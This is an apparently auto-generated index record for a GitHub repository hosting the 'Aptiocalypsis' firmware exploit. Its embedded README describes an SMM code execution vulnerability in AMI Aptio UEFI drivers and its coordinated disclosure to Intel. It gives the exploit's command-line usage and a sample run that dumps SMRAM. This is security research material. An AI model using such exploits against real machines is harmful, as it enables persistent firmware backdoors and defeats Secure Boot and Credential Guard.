{"id":21510106,"url":"https://github.com/cr4sh/aptiocalypsis","last_synced_at":"2025-04-09T17:31:32.948Z","repository":{"id":43621194,"uuid":"71630197","full_name":"Cr4sh/Aptiocalypsis","owner":"Cr4sh","description":"Arbitrary SMM code execution exploit for industry-wide 0day vulnerability in AMI Aptio based firmwares","archived":false,"fork":false,"pushed_at":"2016-10-22T17:27:11.000Z","size":25,"stargazers_count":66,"open_issues_count":0,"forks_count":16,"subscribers_count":9,"default_branch":"master","last_synced_at":"2025-03-23T19:39:06.831Z","etag":null,"topics":["0day","ami","exploit","firmware","intel","smm","uefi","vulnerability"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Cr4sh.png","metadata":{"files":{"readme":"README.TXT","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.TXT","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2016-10-22T09:42:25.000Z","updated_at":"2025-03-16T11:05:25.000Z","dependencies_parsed_at":"2022-09-13T12:51:34.772Z","dependency_job_id":null,"html_url":"https://github.com/Cr4sh/Aptiocalypsis","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cr4sh%2FAptiocalypsis","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cr4sh%2FAptiocalypsis/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cr4sh%2FAptiocalypsis/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cr4sh%2FAptiocalypsis/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Cr4sh","download_url":"https://codeload.github.com/Cr4sh/Aptiocalypsis/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248077336,"owners_count":21043940,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["0day","ami","exploit","firmware","intel","smm","uefi","vulnerability"],"created_at":"2024-11-23T21:46:41.536Z","updated_at":"2025-04-09T17:31:32.814Z","avatar_url":"https://github.com/Cr4sh.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"\nAptiocalypsis: arbitrary System Management Mode code execution exploit\nfor AMI Aptio based firmware.\n\n**************************************************************************\n\nFor more information about this project please read the following article:\n\nhttp://blog.cr4.sh/2016/10/exploiting-ami-aptio-firmware.html\n\n\nThis code exploits vulnerability in UEFI SMM drivers of AMI Aptio based firmwares to execute arbitrary SMM code. Running of arbitrary System Management Mode code allows attacker to disable flash write protection and infect platform firmware with persistent backdoor that survives OS reinstall, disable Secure Boot, bypass Virtual Secure Mode (Credential Guard, etc.) on Windows 10 Enterprise and do others evil things. Also, Aptiocalypsis exploit is the first publicly demonstrated successful attempt of breaking SMM_Code_Chk_En exploit mitigation feature that presents on Intel CPUs starting from Haswell microarchitecture.\n\nThe vulnerability was discovered during reverse engineering of platform firmware from 6-th generation Intel NUC. Totally I discvoered three 0day vulnerabilities in NvmeSmm, SdioSmm and UsbRt drivers from AMI and one in ItkSmmVars driver from Intel. Vulnerabilities was reported to Intel at 15.07.2016 and after several working days both Intel and AMI confirmed all of the security issues. Intel decided to release a single advisory INTEL-SA-00057 to cover all four vulnerabilities:\n\nhttps://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00057\u0026languageid=en-fr\n\nFixed firmware for my NUC of version SYSKLi35.86A.0051 was released at 10.08.2016:\n\nhttps://downloadcenter.intel.com/download/26195/BIOS-Update-SYSKLi35-86A-\n\nVulnerable UEFI SMM drivers are also presents in computers with AMI based firmware from other manufacturers. For example, firmware of Asus Q170M-C motherboard has two from four vulnerable drivers described above. At this moment it seems that Intel is only one OEM company who released advisory and fixes for these vulnerabilities. Probably, in some future we’ll see some information about vulnerable products from other vendors. Original reports that was sent to Intel can be found in reports/ folder:\n\nhttps://raw.githubusercontent.com/Cr4sh/Aptiocalypsis/master/reports/Intel_NUC_AMI_vuln.txt\nhttps://raw.githubusercontent.com/Cr4sh/Aptiocalypsis/master/reports/Intel_NUC_ITK_vuln.txt\n\nPlease note, that at this moment even patched firmware versions still allows to use these vulnerabilities to bypass Credential Guard and others Virtual Secure Mode powered features of Windows 10 (see the article for detailed analysis of Intel and AMI security fixes).\n\nAptiocalypsys exploit was tested on Intel NUC NUC6i3SYH with firmware version SYSKLi35.86A.0045, to run this exploit on any other combination of computer model and firmware version you have to add the constants needed by your firmware into the BIOS_VERSIONS array (see the article for detailed information about obtaining these constants).\n\nTo use aptiocalypsis.py program you need to install CHIPSEC framework (https://github.com/chipsec/chipsec).\n\nCommand line options:\n\n# python aptiocalypsis.py [\u003cdump_address\u003e \u003cdump_size\u003e [dest_file_path]]\n\nWhen the program was started with no command line options specified — it checks if it’s possible to exploit NvmeSmm driver vulnerability on current platform. In other case — it dumps specified region of physical memory into the file or prints it’s hexadecimal dump into the stdout if dest_file_path argument was not specified. \n\n\nExample of using aptiocalypsis.py to dump SMRAM on Inel NUC:\n\n# python aptiocalypsis.py 0x8b400000 0x400000 /tmp/smram_dump.bin\n****** Chipsec Linux Kernel module is licensed under GPL 2.0\nSelected BIOS version is SYSKLi35.86A.0045\nDump address is 0x8b400000:8b7fffff\nPhysical memory for temporary read buffer allocated at 0x846800000\nSMM memcpy() address is 0x8b702110\nTarget \"lea reg, func_table\" instruction to patch is at 0x8b6edf4d\nTrigerring SW SMI 0x42 to overwrite byte at 0x8b6edf50 with 7...\nTrigerring SW SMI 0x42 to overwrite byte at 0x8b6edf51 with 7...\nTrigerring SW SMI 0x42 to overwrite byte at 0x8b6edf52 with 7...\n3 function arguments are at 0x00000500\nFake functions table address is 0x8a75e65b\nSMM communication buffer address is at 0x00000204\nSMM communication buffer is at 0x00000300\nTriggering SW SMI 0x31...\nSUCESS: SMM function 0x8b702110 was called\nWriting 0x400000 bytes of readed memory into the /tmp/smram_dump.bin\n\n\nWritten by:\nDmytro Oleksiuk (aka Cr4sh)\n\ncr4sh0@gmail.com\nhttp://blog.cr4.sh\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcr4sh%2Faptiocalypsis","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcr4sh%2Faptiocalypsis","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcr4sh%2Faptiocalypsis/lists"}